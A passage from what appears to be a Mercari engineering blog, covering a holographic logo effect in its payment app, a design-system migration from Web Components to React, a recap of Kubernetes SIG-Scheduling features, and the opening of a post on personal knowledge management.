When your device automatically switches to low power mode, or when you decide to switch to this mode manually in order to save battery, we want to make sure that our software does not use features that are power hungry. For that reason, when Low Power Mode is active we disable the Hologram effect and we replace it with a static image instead.

Activate the effect only when necessary

Mercari is a feature rich application because it contains many screens and lots of functionality. One of the main features of the app, Merpay, is currently the only feature in the app where the holographic effect is used, and more specifically only on the Payment tab. But monitoring the device position can occur on any screen within the application, even in the background when unintended.

Because we want to activate the effect only when our users are actually looking at it, we use the SwiftUI lifecycle to turn on or off the effect.

In the following cases we activate it:

When the Payment tab is active and visible

In the following cases, we deactivate it:

When the user is not on the Payment screen
When the user is on the Payment screen but also navigating into a sub screen such as Payment Settings for example.

When we deactivate the effect, we don’t just lower the refresh rate of the motion monitoring, we make sure that it is stopped entirely. Because this effect involves masks and gradients on the UI screen, we also replace the UI with a static image (the same as when in low power mode).

What is special about the iOS implementation?

Implementation

On iOS the user interface was implemented with Apple’s latest UI framework, SwiftUI, rather than the older UIKit. This meant that we could take advantage of Combine and SwiftUI’s Published properties to automatically update the logo gradient colors, angle, and intensity whenever new motion data was received in real time without needing manual intervention.

For the Mercard logo UI we used an image of our logo as a mask to place over our gradient, giving the effect that the logo itself was holographic. SwiftUI provides easy and effective ways to stack and layer views, so the actual view related code was very minimal and quite simple to create. Creating a similar effect in UIKit would require a lot more code related to view constraints and adding subviews, and updating our gradient attributes would have been a more manual and tedious process.

Life Cycle

Since it was important to monitor energy usage to reduce unnecessary battery consumption, the Merpay dashboard screen was monitored to make sure the effect was disabled when it wasn’t displayed. During this process the SwiftUI lifecycle event onAppear was behaving strangely on iOS 14, giving multiple true and false values at unexpected times. Leaving it like that would have kept the holographic effect running in the background in some cases, so we needed to figure out how to fix it. The solution we came up with was to monitor UIKit’s view controller life cycle instead, which led to more accurate readings and kept the effect from being enabled when we didn’t expect it.

What is special about the Android implementation?

Similar to iOS, the Android user interface was implemented using Jetpack Compose. This meant that we could compartmentalize the UI component breaking it off from the other implementations in a relatively concise and simple manner. We use device sensors, however, there is no getting around the Android lifecycle. We split the implementation into two components: a “provider” that receives readings from the sensor and calculates the colors to display, and the actual UI component that receives the color and displays the icon on screen.

Drawing the logo from a state was very easy. Thanks to Compose, this was accomplished with a simple 50 line Composable. If this were to be done using the old View system, this would be much longer with more boilerplate code. The pros of using Compose lies in using feature flags as well. With Compose, we can completely split the implementation using just a simple if statement.

An issue we had along the way was when we were using the emulator to test, we were confused when the emulator rotation display did not match the actual values returned. This was due to the emulator controls rotating the model at the center of the device, but the sensor returning values are relative to the camera position, where the actual sensor is placed.

Emulating device rotation

How do we do Quality Assurance on this project?

On a huge project like Mercari, Quality Assurance is very important to ensure that our users won’t experience bad behavior in the application.

The Quality Assurance team gathers devices and executes scenarios while observing and measuring the outputs.

In this project, because it’s a project that has an impact on the UI and devices’ power consumption, it was necessary to gather different types of terminals for a thorough test.

On both Android and iOS, verifications are done on:

Old devices: They are often slower than new ones. They are equipped with older chipsets that can potentially get hot when using this feature
Recent devices: They need to run the new features flawlessly, without overheating and without fps drops. Otherwise, it does not make sense to propose the feature to our users in the first place. Some new devices also show new UI features such as Dynamic Island on the iPhone 14 Pro and it is important for us that our users have a great experience in general but also when using brand new flagship devices from constructors.
Large screen devices and small screen devices: We choose iPad-like devices to make sure there are no UI issues when using wide screens. We choose iPhone SE-like devices when we want to verify that the UI is working properly on smaller screens.

If the team encounters any issue during those tests, bug tickets are created. Later on, engineers fix the bugs and the QA team restarts the tests execution process.

Conclusion

It was a long journey from original concept to final product, and a lot of talented people came together to create this interactive Mercard logo that we can be proud of to share with our users. Great care was put into this project, as we do with all new features that we bring into the Mercari app, and we invite everyone to try it out!

Web Design System: Migrating Web Components To React

Thu, 08 Dec 2022 11:00:11 GMT

This post is for Day 8 of Mercari Advent Calendar 2022, brought to you by Williams Kwan from Mercari Core team and Faisal Rahman from the Mercari Architect team.

Intro

Mercari internal design systems power the UI in Mercari web apps. It allows Frontend engineers to implement UI changes quickly by providing UI building blocks. The design system is currently built using Web Components but we are in the process of migrating it to React. This article aims to highlight our migration journey. We hope you find something interesting here :).

Leaving Web Components

What is Web Components

Web components is a set of technologies that allows you to create isolated, custom html elements.

For example, let’s create a custom component called attention-link. Notice that

We can use this component like any other html element. Great for reusability!
CSS is scoped to the custom component. No CSS naming collision!

codepen link

const template = document.createElement('template');
template.innerHTML = `
      <style>
        a {
          margin-top: 20px;
          color: red;
          font-size: 20px;
          font-weight: bold;
        }
      </style>
      <a target="_blank" rel="noopener">Give me attention</a>
      `;

class AttentionLink extends HTMLElement {
  connectedCallback() {
    this.attachShadow({mode: 'open'});
    this.shadowRoot.appendChild(template.content.cloneNode(true));
  }
}

window.customElements.define('attention-link', AttentionLink);

<a>Basic link</a>
<br/>
<attention-link>Attention seeking link</attention-link>

attention-link custom web components

These features allow easy creation and usage of custom components. Mercari web engineers don’t have to think about every single component design. They can simply use custom components to build UI rapidly.

Why we chose Web Components

Mercari as a company has various divisions. Each team is autonomous and are free to choose their tech stack as they see fit. This leads to separate Frontend frameworks being used. For example the marketplace web app is built using React while Merpay uses Vue.

Web Components allows us to build 1 design system library that is consumable by many different frontends with varying frameworks.

Problems with current design system built using Web Components

Lack of usage and contributors

At this point you might think that the same createComponent thin wrapper exists for the other frameworks. The answer is no, React design system package is the only package produced and consumed. Remember how each team has autonomy? This means that each team can choose to maintain their own design system if they wish to do so.

Merpay, for example, does not consume the common design system due to poor SSR and difficulty to maintain Web Components and Vue at the same time.

Lack of usage leads to less contributors which leads to less usage. This feedback loop is hard to change unless we make a drastic change.

Dynamic rendering migration to SSR

Mercari implements dynamic rendering with Rendertron to serve JavaScript-generated content to web crawlers. With dynamic rendering, requests from bots are redirected to server-rendered pages so that they can read JavaScript-generated content well. Over time, we find that the dynamic rendering solution requires significant resources to run and maintain, this was also the same reason Google only recommended dynamic rendering as a workaround, not a long term solution. We looked for alternatives and decided on decommissioning the dynamic rendering service in favor of rendering our pages on the server side for SEO.

Problem then arose with our Web Components. We found that there was no simple way to support server-side rendering of Web Components. We looked into declarative shadow DOM, but the browser support is not ideal as of now; It could not fulfill our browser support policy. Lit labs offers an experimental SSR package, but we deemed it not stable enough for production. We then decided to explore the possibility of moving away from Web Components altogether.

Technical limitations with Web Components

At the time of writing, Web Components also has some technical limitations. This usually stems from shadow DOM causing isolation between components. For example, input-label association across the shadow boundary.

Current design system architecture

We are using Lit to build Web Components easier. Lit is a lightweight library for building fast, lightweight web components. We then wrap respective Web Components with ourcreateComponent wrapper utility. This produces a React component from the Web Component. Consumers can import components from the React package and interface with them as React components, but clients will see the Web Components rendered on their side.

current architecture

Migrating to React

As we’ve discussed above, Mercari’s design system is no stranger to React. We already serve React components in a separate package, complete with the tooling. Most of the design system’s consumers use React in their codebase, and therefore consume the React components instead of Web Components as well. We naturally turned towards React to investigate first, we found several key benefits over the current structure.

SSR Support

React offers extensive support for SSR through ReactDOMServer rendering and hydration on the client side. Rewriting the components to React would open up the possibility for migrating from dynamic rendering to SSR.

Promoting collaboration

React is a familiar ecosystem to the engineers in Mercari. Conversely, Web Components and Lit are not widely used across the organization. Moving to a more familiar ecosystem would open up contributions from engineers across the organization, allowing us to adopt a more collaborative contribution model.

Simplified maintenance

We had packages written in two different technologies. Even though the previous React package only implemented a thin wrapper around the web components, bugs and issues may still arise in both packages. Deprecating the web components package will help simplify the maintenance, a crucial point to consider since resources allocated to maintaining the design system are limited.

Migration Process

Steps

Proof of Concept (POC) Project

Migrating a library with 70+ public exports is a huge task. We decided to start with a proof-of-concept (POC) project first to better understand the complexity and to form a solid guideline for migrating all the components. The design system migration project is tightly related to the dynamic rendering migration project, so we decided to kick off with migrating the components used in the SSR POC projects.

We first determined the components to be migrated. We looked at the pages in scope for the SSR POC projects, then we catalog all the components rendered on the client side. Luckily, we could easily do so by walking through the DOM tree, since the web components have identifiable tag names. We then separate the related components into batches to be worked on by individual engineers.

As we worked on migrating the POC components, we documented the lessons learned along with the technical decisions we took, such as how to handle component styling, typing the component events, etc. We also documented the breaking changes introduced by the migration, such as named slots which were replaced by component props. The documents would then serve as the guideline for the actual migration. By having a unified guideline document, new migration contributors can get onboarded more quickly.

Batched migrations

In the POC, we migrated the package in batches of related components. We worked in a shared development branch, from which the batches would branch out. The tooling on the React package is set up to produce a canary release on each commit, so the SSR POC can consume the resulting canary package from the development branch after all the batches have been merged.

Now that the POC project has concluded, we found that migrating in batches is more favorable than migrating all the components at once. Migrating in batches of components lets us assign the tasks more flexibly, and makes the migration process more transparent for interested parties. It will also make it easier for consumers to progressively adopt the new components. We decided to make it even more transparent by creating one ticket for each component, as opposed to one ticket per batch like we did in the POC project.

DX utilities

We have various utilities in place to help with development experience (DX) in the current packages. One of the goals of the migration is to prevent regression in development experience, so we have to migrate the utilities as well. We identified several high priority utilities to implement along with the migration.

First one is documentation generation, or docgen in short. Currently, we run a custom docgen script in the React package which extracts documentation from the wrapped web component. It then writes the information into the React component source file as JSDoc comment, and produces a README file from it. Since the Web Components package will be deprecated, we need a new docgen implementation that is independent from the web components.

Second one is type generation for CSS. The current web components use style injection features of Lit, which won’t be available for the new React components. We had to decide on a new architecture for styling the new React components, which will no longer wrap the web component counterparts. We decided on adopting CSS modules, since the tooling has largely been set up on the React package. CSS modules promote encapsulation by mangling the class names, virtually removing the risk of naming collisions and making the styles difficult to override. CSS modules’ encapsulation ensures UI consistency, a crucial trait for a design system. However, CSS modules require us to prepare type declaration files to accompany the CSS files for the intellisense to function properly on them. Therefore, we determined that we need to implement a way to automate that process, either through a code generation script or installing external libraries.

Difficulties

Managing change request

With any big migration, you will be in a state where you have to support both the old and new version at the same time. Making changes to the old components while a new one is being introduced is difficult. Making small per component migration reduces this window but a policy needs to be in place. So we went with locking changes in the old design system while the component was being migrated. We prepared a spreadsheet which noted the status of each component’s migration. The spreadsheet can be accessed by everyone in the organization, so anyone can figure out easily at any moment whether a component is in migration or not. Which allows people to quickly know whether a component is currently accepting change or not.

change request flow

Breaking changes

We try to match the current component interfaces as much as possible. However, there are still cases where breaking changes are unavoidable. For example, slots in Web Components does not translate well into the React world. We convert slots into props which results in breaking changes. Since these are unavoidable we try to make the update as smooth as possible. Releasing per component reduces both risk in broken UI and migration time required by the consumers.

Lack of contributors

The migration team is a virtual team. Meaning each member is assembled from different teams. They have other priorities that result in fluctuating contributions to the migration process. While this is a problem, improving DX and moving to React has more than doubled our team size.

Initial results

During the course of migration, we received delightful news from the SSR POC project, which consumes the migration POC components. A stress test was conducted on the SSR POCs, and the result was compared with the dynamic rendering service’s result. Turns out under similar loads, the SSR POC consumes 30x smaller resources. A promising result in latency was also achieved, it’s still unconfirmed yet and further tests may be required, but we’re looking at orders of magnitude faster over the dynamic rendering service. We are confident that the design system migration can help support the transition to SSR to achieve similar numbers in production.

Conclusion

Web Components has served our design system well. However, with limitations we can no longer ignore it is time to migrate to a React based design system. With positive initial results, we are even more confident in the migration’s benefits.

Tomorrow’s article will be by Stephan Donin. Look forward to it!

SIG-Scheduling Deep Dive (Kubecon Recap)

Tue, 06 Dec 2022 16:00:26 GMT

Hi there. I’m @sanposhiho, working in the Platform Infra team in Mercari, and also I’m a SIG-Scheduling reviewer in Kubernetes community.

I joined KubeCon + CloudNative North America 2022 as a speaker and gave a talk “SIG-Scheduling Deep Dive” along with other SIG-Scheduling maintainers. This blog post is going to summarize this session.

You can see the session video and the slide on the following links!

Session video
Slide

Note that at the time of writing this article, Kubernetes v1.25 is the latest and v1.26 isn’t released. I’m going to explain some features which will be introduced in v1.26 in this article, but the specification or release schedule may get changed.
Please refer to the actual documentation or CHANGELOG when you’d like to use those features.

What’s the Kubernetes Scheduler?

Scheduler decides which Node a newly created Pod will run on. It checks several scheduling constraints, the current allocatable resource on each Node…etc and then decide the best Node for a Pod.
So, scheduler implements a lot of scheduling related features in it, such as NodeAffinity, PodAffinity, Pod Topology Spread…etc.

Scheduler is composed of a lot of plugins, and each plugin runs more than one extension point in the Scheduling Framework.

Mainly, two extension points affect the decision of Node, Filter and Score.

Filter: filter out Nodes which cannot run a Pod. If more than one Filter plugin returns non-success status on the Node, then that Node will be filtered out.
Score: score all remaining Nodes.

For example, requiredDuringSchedulingIgnoredDuringExecution in NodeAffinity is a hard requirement and Scheduler must follow that requirement. So, all Nodes which don’t fit it are filtered out by NodeAffinity plugin in the Filter extension point.
preferredDuringSchedulingIgnoredDuringExecution in NodeAffinity is a soft requirement, and Scheduler prefers Nodes that match it. Therefore, NodeAffinity plugin gives high scores to all Nodes that match it in the Score extension point. Note that in some cases, if other Score plugins give low scores on Nodes which NodeAffinity plugin prefers, a Pod may go to a Node that doesn’t match NodeAffinity.

Here, I just introduced a high-level overview of the scheduler. If you want to learn more about it, then I’d recommend you watch the session Tutorial: Unleash the Full Potential Of Kubernetes Scheduler: Configuration, Extension And Operation In Production.

KEP-2891: Simplified Scheduler Config

Scheduler has the component config called KubeSchedulerConfiguration.

Scheduler Configuration | Kubernetes

You can define which plugins you want to enable in your scheduler like this.

In the past, you needed to specify the plugin in all extension points that the plugin runs.
Actually, it’s kind of troublesome because the plugin may change the behavior and the extension points it runs on. You need to care about where the plugins run when they introduce a new plugin or update already-using plugins in your scheduler.

To deal with this problem, we introduced a new field called multiPoint in Kubernetes v1.23.

When you specify a plugin in multiPoint, then that plugin gets enabled in all extension points that it can run on.

WIP: KEP-3521: Pod Scheduling Readiness

KEP-3521: Pod Scheduling Readiness

This KEP includes two notable changes.

Add .spec.schedulingGates field on Pod.
Add a new extension point called PreEnqueue to Scheduling Framework.

This feature will be introduced in v1.26 as an alpha feature.

Add `.spec.schedulingGates` field on Pod

The current Scheduler puts all newly created Pod into the scheduling queue and starts to schedule a newly created Pod soon. However, some other controllers may know a Pod isn’t ready to get scheduled, for example, when a Pod is managed under some custom resource.
Having Pods that never get scheduled results in wasted time for the scheduler to run the scheduling loop for that Pod, and then affect badly on the overall scheduling throughput.

.spec.schedulingGates represents if a Pod is ready for scheduling. If it’s empty, then the scheduler regards a Pod as scheduling ready and starts to schedule it.

Add a new extension point called PreEnqueue to Scheduling Framework.

PreEnqueue is a new extension point which is called prior to adding Pods to activeQ.
The .spec.schedulingGates feature is implemented as a PreEnqueue plugin and, of course, any other plugins can implement PreEnqueue extension point if they’d like.

KEP-3022: min domains in Pod Topology Spread

It adds a new field minDomains to TopologySpreadConstraints. It literally means the minimum number of domains. It was introduced in v1.24 as an alpha feature, and then graduated as a beta feature in v1.25.

Before introducing minDomains, Pod Topology Spread only had the way to control the degree to which Pods may be unevenly distributed. (maxSkew field)

minDomains is useful for cases like when you want to force spreading Pods over a minimum number of domains and, if there aren’t enough domains already present, make the cluster-autoscaler provision them.

Note that it can be used only with DoNotSchedule.

Let’s see an example to understand it. Let’s say you have the deployment with 2 replicas, which has the following topologySpreadConstraints.

Here topologyKey is specified as kubernetes.io/hostname, so the Pod Topology Spread regards one Node as one domain.
In other words, topologySpreadConstraints says that “place Pods that match the labelSelector in two or more Nodes as evenly as possible.”

Then, what if when only one Node in the cluster? In this case, Pod cannot satisfy the minDomains constraint. Therefore, the first Pod gets successfully scheduled, but the next one gets unschedulable status.

Then, Cluster Autoscaler notices one Pod gets stacked in unschedulable status and creates a new Node to schedule it.

Then, the second replica gets successfully scheduled.

As a result, you can achieve Pods that spread over two Nodes as defined in topologySpreadConstraints.

Let’s take a deeper look at this feature from the implementation aspect of Pod Topology Spread.
Pod Topology Spread filters Nodes based on maxSkew by performing the following calculation.

('existing matching num' + 'if self-match (1 or 0)' - 'global min matching num') <= 'maxSkew'

existing matching num denotes the number of current existing matching Pods on the domain.
if self-match denotes if the labels of Pod match with the selector of the constraint.
global min matching num denotes the minimum number of matching Pods.

Simply put, Pod Topology Spread checks if a Pod does not violate maxSkew when it is placed on this Node by this calculation.

Also, we can define which kind of Nodes will be the target of Pod Topology Spread by nodeAffinityPolicy and nodeTaintsPolicy which will be described in the next section.
Let’s say, for example, that you want to spread pods across multiple zones (zone1, zone2, and zone3) using Pod Topology Spread. However, what happens if there is no Node in zone 3 that is the target of Pod Topology Spread? In this case, Pod Topology Spread cannot notice the existence of the domain itself. In the above formula, zone3 is not taken into account when calculating the global min matching num.
In other words, Pod Topology Spread cannot notice the existence of zone 3 and tries to spread pods only in zone 1 and zone 2.
From an implementation point of view, minDomains can be described as a feature to "make Pod Topology Spread aware of domains that actually exist but are not visible for it". And, in the case of a situation that violates minDomains, Pod Topology Spread will set 0 to the global min matching num.
In the example, let’s say we set 3 to minDomains, Pod Topology Spread currently only notices zone 1 and zone 2, so the global min matching num will always be considered 0. Pods will be scheduled to zone 1 and zone 2 as long as they do not violate maxSkew, but since the global min matching num is 0, Pod Topology Spread will reject all Nodes in zone 1 and zone 2 at some points. Let’s say maxSkew is 1, then once a pod is placed in zone 1 and zone 2, the other pods will become unschedulable.
Cluster Autoscaler internally simulates the scheduler’s scheduling and creates a new Node which unschedulable Pods can be scheduled on. So, in this example, it will add a Node in zone3 that is eligible for Pod Topology Spread.

I hope this example has helped you understand that minDomains is a strong friend when you want to spread pods across multiple domains through Pod Topology Spread and make them really resilient to failures.
In fact, since Mercari is built on a cluster on multiple zones, if we can enforce a situation where all microservices put pods in multiple zones by minDomains, it will make Mercari more resilient to zone failures.

KEP-3094: Take taints/tolerations into consideration when calculating PodTopologySpread skew

It adds new fields nodeAffinityPolicy and nodeTaintPolicy. It’s now served as an alpha feature, and we plan to graduate it to beta in v1.26.

nodeAffinityPolicy and nodeTaintPolicy are the options to specify whether to take nodeAffinity and taints/tolerations into consideration when Pod Topology Spread calculates the skew.

The problem behind it was that it always didn’t take Node taints into consideration and it sometimes resulted in unexpected behavior. Let’s see an example.
Let’s say you have topologySpreadConstraints like the following, and one Node has a untolerated taints.

The scheduler takes both Nodes into consideration, but it doesn’t care about the taints.
In this case, the first Pod can go to Node1. However, the second one will be Pending since Node2 has the taint regardless of the Pod Topology Spread wanting to schedule it on Node2.
By setting Honor to nodeTaintsPolicy, the scheduler ignores tainted Nodes and we can avoid the problem.

KEP-3243: Respect PodTopologySpread after rolling upgrades

This adds a new field matchLabelKeys to Topology Spread. It’s now an alpha feature.

The problem behind it was that the topology spread takes old replicas into consideration during rolling upgrades. This may end up in the unbalanced topologies because all old replicas are, of course, removed after rolling upgrades.

matchLabelKeys will solve this issue. The topology spread constraint uses those keys to look up label values from the incoming pod; and those key-value labels are ANDed with labelSelector to identify the group of existing pods over which the spreading skew will be calculated.

So, by setting pod-template-hash in this matchLabelKeys, the scheduler takes only Pods with the same pod-template-hash into considerations, which means only new replicas will be considered during rolling upgrade.

Worth noting features/fixes

Above are the feature changes listed in KEP, but there are a few more interesting updates related to the Scheduler so I’ll share them from here.

Performance improvement on DaemonSet Pod’s scheduling latency

Update PreFilter interface to return a PreFilterResult #108648

This Pull Request contains two changes.
The first one; it changes PreFilter plugins to return PreFilterResult. PreFilterResult contains the set of nodes that should be considered downstream extension points. It contributes to reducing wasted calculations in the downstream plugins.

The second one; it changes NodeAffinity PreFilter to return appropriate PreFilterResult.
DaemonSet is actually using NodeAffinity to schedule each Pod on a specific Node. And, if NodeAffinity has such a hard constraint, then it can return PreFilterResult that includes only one Node.
Then, as described, all other downstream plugins evaluate only one Node and the scheduling latency for DaemonSet Pod got much improved.

Fix memory leak on kube-scheduler preemption

Fix memory leak on kube-scheduler preemption #111773

The scheduler had the long-live context which was alive during the scheduler running.
Then, mistakenly, the scheduler created a child context by context.WithCancel(ctx) from that long-live context, and it didn’t get canceled.

As you can see in the following doc, if you don’t call cancel, then a child context doesn’t get canceled and it doesn’t get GC-ed until the parent context is canceled. This means that the parent context is going to live forever until the scheduler itself stops.

Calling the CancelFunc cancels the child and its children, removes the parent’s reference to the child, and stops any associated timers. Failing to call the CancelFunc leaks the child and its children until the parent is canceled or the timer fires.
https://pkg.go.dev/context

This patch was introduced in other versions as well, and we refactored the scheduler’s internal structure to prevent such a problem from happening in the future.

fix(scheduler): split scheduleOne into two functions for schedulingCycle and bindingCycle #111775

Flush internal unschedulablePods pool every 5m (from 60s)

Set PodMaxUnschedulableQDuration as 5 min #108761

In the SchedulingQueue, we have two queues and one Pod pool; activeQ, backoffQ, and Unschedulable Pod pool.
If a Pod gets unschedulable status, then Scheduler moves a Pod to Unschedulable Pod pool.
Scheduler will move Pods in Unschedulable Pod pool to activeQ/backoffQ when something happens that may allow a Pod to become schedulable. (like new Node created, Node updated…etc)

Another way for Pods to leave the Unschedulable Pod pool is flushing; Scheduler flush the Unschedulable Pod pool every certain minute so that Pods can fairly get the opportunity to get scheduled. But, we’re not sure if it really helps some Pods, we’re wondering if event-based moving should be enough and if we could remove this flushing.

This PR changes the interval of flushing from 60s to 5m and we hope we can remove the flushing completely in the future.

Component Config in kube-scheduler is stable now

Graduate component config to stable in kube-scheduler #110534

As I said, Scheduler has a component config KubeSchedulerConfiguration and it reached v1.

The legacy scheduler policy config is removed in v1.23

remove scheduler policy config #105424

The legacy scheduler policy config is removed completely, and you should move to KubeSchedulerConfiguration if you’re still using it.

Kube-scheduler-simulator

From here, I would introduce sub projects from SIG/Scheduling.

The first one is kube-scheduler-simulator.

kubernetes-sigs/kube-scheduler-simulator

Nowadays, the scheduler is configurable/extendable in multiple ways. But checking the scheduling decision in detail is kind of hard. Checking each plugin’s decision requires increasing the log level, and it also requires strong permission on your cluster.

The simulator helps you check/evaluate the scheduler’s behavior easily, which doesn’t even require you to prepare the Kubernetes cluster and you only need to run the simulator binary. (+ simulator-web client if you’d like to use it)

It’s still a young project, and it hasn’t even reached its first release.

It has own kube-apiserver in it, and you can do anything by communicating with it like in a real cluster.
Then, when you create Pods in the simulator, the details of a scheduling result, such as scores and filtering results, will be added to Pod’s annotation like magic.

The simulator also has a web client and you can check the results easily like this. (You don’t necessarily need to use Web UI because Pod annotation has all scheduling results displayed in the Web UI.)

Now, we are developing to reach its first release (v0.1.0) and also, we’re discussing a new feature scenario-based simulation.

Kueue

kubernetes-sigs/kueue

Kueue stands for Kubernetes-native Job Queueing.
It’s also a newer project of a job queueing controller designed to manage batch jobs as a single unit.

It has these core features:

Quota management: It controls who can use what kind of resources and the limitation of the usage.
Fair sharing of resources between tenants: To maximize the usage of resources, any unused quota assigned to inactive tenants should be allowed to be shared fairly between active tenants.
Flexible placement of jobs across different resource types based on availability: You can have various resources such as different architectures (GPU or CPU models) and different provisioning modes (spot vs on-demand).
Different queueing strategies:
- StrictFIFO: Simply First In First Out.
- BestEffortFIFO: Basically FIFO, but if older workloads can’t be admitted, it will not block newer workloads that can be admitted.

You can see its concepts and APIs here.
https://github.com/kubernetes-sigs/kueue/tree/main/docs/concepts

Also, the community published a blog post to introduce Kueue, which you can also refer to know more about it.
https://kubernetes.io/blog/2022/10/04/introducing-kueue/

Descheduler

kubernetes-sigs/descheduler

Scheduler only checks the cluster’s situation and decides the best Node for Pods at that time. But, Kubernetes cluster changes from moment to moment.

Then, here is Descheduler; it checks the latest cluster’s state, and evicts Pods running in
non-appropriate Nodes. It expects that replicaset or something creates Pods again and Scheduler schedules those Pods on the best Nodes.

You can configure which Pods are eligible for descheduling by DeschedulerPolicy.

That’s it about the overview of Descheduler. Let’s see the latest updates from here.

Descheduler Framework Proposal #753

It’s a big internal architecture change that proposed changing each policy to a plugin like Scheduling Framework and make Descheduler pluggable and easy to expand.

feat(leaderelection): impl leader election for HA Deployment　#722

It’s a leader election feature for High Availability.

Limit the maximum number of pods to be evicted per Namespace #656

Descheduler has a policy maxNoOfPodsToEvictPerNode, which defines the maximum number of Pods to get evicted per Node.
This Pull Request introduced maxNoOfPodsToEvictPerNamespace which defines the same one per Namespace.

Kwok (Kubernetes WithOut Kubelet)

kubernetes-sigs/kwok

This is a quite new project. It can create fake Nodes and fake Pods behaving like real Nodes and Pods.
Its strength is that you don’t need to start real Nodes or Pods to check the behaviors of Scheduler, Cluster Autoscaler, or any controllers.

Scheduler-plugins

kubernetes-sigs/scheduler-plugins

Some Scheduler’s plugins like NodeAffinity, PodAffinity, etc exist by default inside the scheduler.
However you can also implement your own scheduler plugins to satisfy your own use cases.

The scheduler-plugins repository contains plugins that are maintained by the community, but are not integrated into the upstream scheduler by default.

If you find a feature you want but does not exist in the scheduler, take a look in this repository and you may find something that fits your requirements, or you may find an idea that will help you solve your problem.

Wrap-up

This completes all the explanations of what was presented during the session. From here, I would like to give a light summary, including a few personal thoughts.

First, regarding the changes in the upstream Scheduler, you probably thought there are so many things introduced in Pod Topology Spread. The NodeAffinityPolicy, NodeTaintsPolicy, and MatchLabelKeys are definitely necessary to correct the unpleasant behaviors of Pod Topology Spread. You must consider using them when using Pod Topology Spread in your workloads.

Among other changes, I personally see great potential in the PreEnqueue plugin extension point introduced with SchedulingGates. Until now, it has not been possible for plugins to control the behavior of Scheduling Queues in detail, so I expect the PreEnqueue plugin extension points makes it possible to improve scheduler performance by adding some plugins specific logic.

Among the Sub Projects, Kueue is probably the most interesting one for me at the moment.
There have been several projects to use Kubernetes in clusters for batch jobs, such as machine learning, and it is interesting to see how Scheduler can be extended to schedule batch jobs efficiently.
To try to support such batch workloads as a Kubernetes community, [wg-batch](https://github.com/kubernetes/community/blob/62b16d1aafdd744708c2f5243f 90e858806bff95/wg-batch/README.md) was born and Kueue is being developed by them.
Currently, v0.2.X is the latest at the time of writing, and although it is still a young project, I look forward to future developments, how the project goes, and the future brought by them!

Kubernetes contributor award

It’s honored to receive the Kubernetes contributor award from the community. It’s a pleasure to work with the SIG-Scheduling members and I greatly appreciate all help from everyone 🙂

https://www.kubernetes.dev/community/awards/2022/#scheduling

Wow, I got Kubernetes contributor award this year!
I'm beyond honored to receive it! Thanks #KubeCon pic.twitter.com/L8ikZU58SQ

— さんぽし/sanposhiho (@sanpo_shiho) October 25, 2022

Capturing and applying knowledge through a personal knowledge management practice

Sun, 04 Dec 2022 11:00:50 GMT

Summary

This post is for Day 4 of Mercari Advent Calendar 2022, brought to you by @josh from the Engineering Office.

Many engineers and engineering managers at Mercari are big advocates of personal knowledge management (PKM), and they enjoy capturing, organizing, and sharing the knowledge they have gained through their work or personal lives. We even have an internal Slack channel for sharing PKM-related topics.

As the saying goes, "knowledge is power." But how do we get to the point of that knowledge becoming power?

In this blog post, I’ll describe:

Some benefits of PKM
A method for approaching PKM
Applying knowledge management in an organization

My goal in this blog post is to help you understand how your knowledge can benefit yourself in the future as well as your colleagues and maybe even your entire organization.

What is personal knowledge management (PKM)?

PKM is the practice of capturing and organizing personal knowledge systematically so that we can retrieve, build upon, and share that knowledge in the future. To put it another way, imagine having what many PKM advocates call a "second brain," with all your notes available through search or an interconnected network of links or tags.

To achieve this state, you will need knowledge management software that you can treat as your knowledge base. Some popular PKM tools include:

Obsidian, which has a variety of plugins to add and further expand functions
Notion, which has many features ready to use out of the box
Roam Research, which has a unique "multiplayer" sharing feature

Please note that the descriptions of the tools mentioned above may change over time.

How you document and use your knowledge depends on your circumstances; I encourage you to research and experiment with the variety of knowledge management software available.

Benefits of PKM

Some benefits of capturing our personal knowledge include:

Recording and better understanding our thoughts or processes at a given time
Retrieving knowledge in a systematic way
Reducing time spent remembering or relearning knowledge
Achieving a single place—the oft spoken-of "single source of truth"—for knowledge
Sharing knowledge more easily

Understanding these benefits is important when we start forming the habit of capturing knowledge.

A key part to forming that habit is to recognize how we can retrieve that knowledge in the future. Whether you prefer searching, tagging, or browsing a graph (depending on the PKM tool) to find knowledge, you have a variety of options to retrieve your knowledge. And by being able to easily retrieve that knowledge, we can further build on or share that knowledge with others.

Establishing an approach to PKM

Now that we see the benefits of practicing PKM, how do we set up a foundation for documenting our knowledge and leveraging our second brain?

Capture knowledge

First, we need to capture our knowledge. We need to recognize that the knowledge we have is important, applicable in the future, and worth documenting.

In knowledge management, there are three types of knowledge:

Explicit knowledge is easy to document, often based on facts, and can be shared with others.
- For example, instructions on how to log in to the Mercari app on the web would be explicit knowledge.
Implicit knowledge is based on our experiences when we apply explicit knowledge.
- For example, notes on how you pack specific types of items on Mercari and where you send them from would be implicit knowledge.
Tacit knowledge is based on intuition and experiences that are difficult to convey.
- For example, your experience with the buying and selling process on Mercari would be tacit knowledge.

By capturing our explicit and implicit knowledge to the best of our abilities, we can reference and build on our knowledge, Additionally, that documented knowledge may be helpful in conveying the tacit knowledge that comes with our unique experiences in our work and personal lives.

Organize knowledge

Gradually, our knowledge begins to pile up. Two popular methods to ensure that our knowledge is easy to find are tagging and linking. By using tags and links, we can be sure that related notes are linked to each other.

As a visual example, in the heading of this blog post, you may have noticed a sphere containing many nodes. Each of those nodes is a note, and the network of lines shows a linkage between notes. In the software that I personally use, if I hover over a large node, I can see which notes I have linked to within the larger node.

As you can see, I have many notes that complement my main “✨Little victories – 2022” note and provide me with greater context.

Retrieve knowledge

Within knowledge management software, we can retrieve knowledge in a variety of ways, such as:

Searching by keyword
Navigating from one note to linked notes on the related topic
Using tags to show notes on the same topic or idea

By retrieving our knowledge, we not only find what we previously documented but also have a chance to update that knowledge if the content is outdated. In a PKM environment, maintaining our knowledge is especially important because we are the sole owners of our "knowledge gardens."

Apply knowledge

Now that we’ve captured, organized, and retrieved our knowledge, we need to apply that knowledge in order to reap the benefits.

We can apply knowledge in a variety of ways, like:

Presenting at a conference
Planning our own career and skill development
Continuing with a project from weeks or months ago, without having to rely on memory

These methods of applying knowledge are only a few examples. Again, once we start forming habits to systematically capture and retrieve our knowledge, we will get into the habit of knowing where to look and save time and effort in relearning.

Practicing knowledge management in the organization

Now that we’ve discussed PKM, let’s take it a step further by applying the knowledge management practice throughout an organization.

Before we do that, let’s consider the popular knowledge management adage, "Getting the right knowledge to the right person at the right time." This concept is vital in how we think about knowledge management and base our efforts for capturing, sharing, and maintaining knowledge.

